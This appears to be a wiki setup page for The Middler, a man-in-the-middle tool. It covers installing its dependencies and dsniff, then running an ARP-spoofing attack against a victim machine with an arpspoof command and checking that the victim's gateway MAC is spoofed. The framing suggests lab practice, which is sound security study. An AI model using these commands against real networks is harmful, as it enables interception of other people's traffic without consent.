= (Higher Bandwidth) Getting Set Up Using the Samurai WTF Bootable Linux Distribution =
 # Download the latest copy of Samurai-WTF at samurai.inguardians.com
 # Boot Samurai-WTF from the live CD or from a virtual environment like VMware.
 # Install Middler's dependencies by opening a terminal and running: <br> {{{sudo aptitude install libdumbnet-dev python-libpcap python-beautifulsoup python-scapy}}}
 # Install Middler by running: <br> {{{svn checkout http://middler.googlecode.com/svn/trunk/ middler-read-only}}}
 # Install dsniff so we can spoof ARP tables on victim machines (This functionality will be included in Middler within the next few weeks): <br> {{{sudo aptitude install dsniff}}}
 # Since middler needs to listen on port 80, shut down apache: <br> {{{sudo /etc/init.d/apache2 stop}}}

= Getting Set Up On Your Own Machine =
#. Install Python 2.6.x.

#. Download and install dsniff to allow The Middler to ARP spoof.

#. To let The Middler run dsniff's arpspoof, get the latest source from dsniff's page. Here's a direct link to dsniff 2.3 (stable). On Mac OSX, we found the 2+ year old beta, dsniff-2.4b1.tar.gz Dsniff 2.4 Beta 1 to work better.

#. On Linux, install the Netfilter Python module. This dependency is going away. You can download this stable source or do a Subversion checkout.

#  Install Middler by running: <br> {{{svn checkout http://middler.googlecode.com/svn/trunk/ middler-read-only}}}


= Playing with Middler =
 # Move into the Middler's directory: <br> {{{cd middler-read-only}}}
 # Start up Middler with: <br> {{{sudo ./middler.py}}}
 # Choose a victim computer (or start a second VM to pick on)
 # On the machine running Middler, start an arpspoof attack against your victim: <br> {{{arpspoof -i <interface> -t <victim_ip> <gateway_ip>}}}
 # On the victim machine, verify the gateway's MAC address is being spoofed: <br> {{{arp -n}}}
 # On the victim machine, open a browser and surf to www.frog.com